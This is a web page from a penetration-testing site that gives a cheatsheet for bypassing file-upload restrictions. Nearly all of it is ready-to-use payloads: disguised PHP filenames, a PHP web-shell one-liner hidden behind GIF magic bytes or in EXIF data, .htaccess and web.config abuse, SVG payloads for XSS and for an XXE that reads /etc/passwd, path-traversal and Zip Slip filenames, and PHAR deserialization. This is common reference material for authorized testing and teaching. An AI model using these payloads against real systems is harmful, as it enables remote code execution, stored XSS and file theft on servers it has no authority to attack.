← All Cheatsheets
web-pentest

File Upload Bypass

Bypass file-upload restrictions to reach RCE/XSS — extension and MIME/magic-byte tricks, .htaccess/web.config abuse, SVG/HTML/XXE uploads, path traversal and parser/deserialization bugs.

1 views Jun 2026 lazyhackers
Extension Tricks (8)
shell.php.jpg
Double extension — misconfigured servers execute the .php
extension double
shell.pHp
Case variation to dodge a lowercase blacklist
extension case
shell.phtml
Alternate PHP extension filters often miss
extension php
shell.php5
Legacy PHP extension mapping
extension php
shell.phar
PHP archive — executed as PHP
extension phar
shell.php%00.jpg
Null-byte truncation (old PHP / CGI)
extension nullbyte
shell.php.
Trailing dot stripped by Windows, leaving .php
extension windows
shell.asp;.jpg
IIS semicolon trick — treated as .asp
extension iis
MIME & Magic Bytes (4)
Content-Type: image/jpeg
Spoof the MIME header while uploading a script
mime header
GIF89a;<?php system($_GET[0]);?>
GIF magic-byte prefix + PHP payload
magicbyte gif
exiftool -Comment='<?php system($_GET[0]);?>' image.jpg
Embed PHP in a real image's EXIF comment
magicbyte exif
prepend \xFF\xD8\xFF before <?php ... ?>
JPEG magic bytes to pass content sniffing
magicbyte jpeg
Server Config Upload (3)
.htaccess -> AddType application/x-httpd-php .jpg
Upload .htaccess so .jpg runs as PHP (Apache)
htaccess apache
.htaccess -> php_value auto_prepend_file shell.gif
Prepend an uploaded "image" as PHP
htaccess apache
web.config -> add ASP/ASPX handler
Upload web.config to enable script exec on IIS
iis webconfig
SVG / HTML / XML (4)
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/>
Stored XSS via an uploaded SVG
svg xss
<svg><script>alert(1)</script></svg>
SVG script execution
svg xss
<!DOCTYPE svg [<!ENTITY x SYSTEM "file:///etc/passwd">]><svg>&x;</svg>
XXE via an uploaded SVG
svg xxe
shell.html containing <script>...</script>
HTML upload → stored XSS on the same origin
html xss
Path & Overwrite (3)
../../../var/www/html/shell.php
Path traversal in the filename to control where it lands
path traversal
archive with ../../shell.php (Zip Slip)
Extraction path traversal via a crafted archive
zipslip archive
filename=config.php
Overwrite a sensitive file by reusing its name
overwrite
Parser & Deserialization (2)
phar://uploaded.phar/x
Trigger PHAR deserialization on a later file operation
phar deserialization
malicious.gif (ImageMagick MSL / Ghostscript)
Image-parser RCE (ImageTragick-class bugs)
imagemagick rce

Related Articles

5
Web Hacking

JSON and YAML Unsafe Deserialization

Deep technical analysis of insecure deserialization across Java, PHP, Python, and Node.js …

20m read
Web Hacking

Supply Chain Attacks

Deep technical guide to software supply chain attacks — dependency confusion, malicious np…

16m read
Web Hacking

Cross-Site Scripting Mastery

Complete XSS guide covering all attack types, filter bypasses, CSP evasion, cookie stealin…

19m read
Web Hacking

File Upload to RCE

Complete file upload exploitation guide — MIME bypass, double extension tricks, polyglot J…

12m read
Web Hacking

Advanced SSRF

Complete SSRF exploitation guide — AWS IMDSv1/v2 credential theft, GCP/Azure metadata, bli…

16m read

Related Courses

2
Intermediate

Web Application Penetration Testing

Master web hacking from recon to reporting

30 · 9.3h
Intermediate

Bug Bounty Hunting — From Recon to Bounty

The practical playbook for finding real bugs on real targets. Recon methodology, vulnerabi…

0 · 7.2h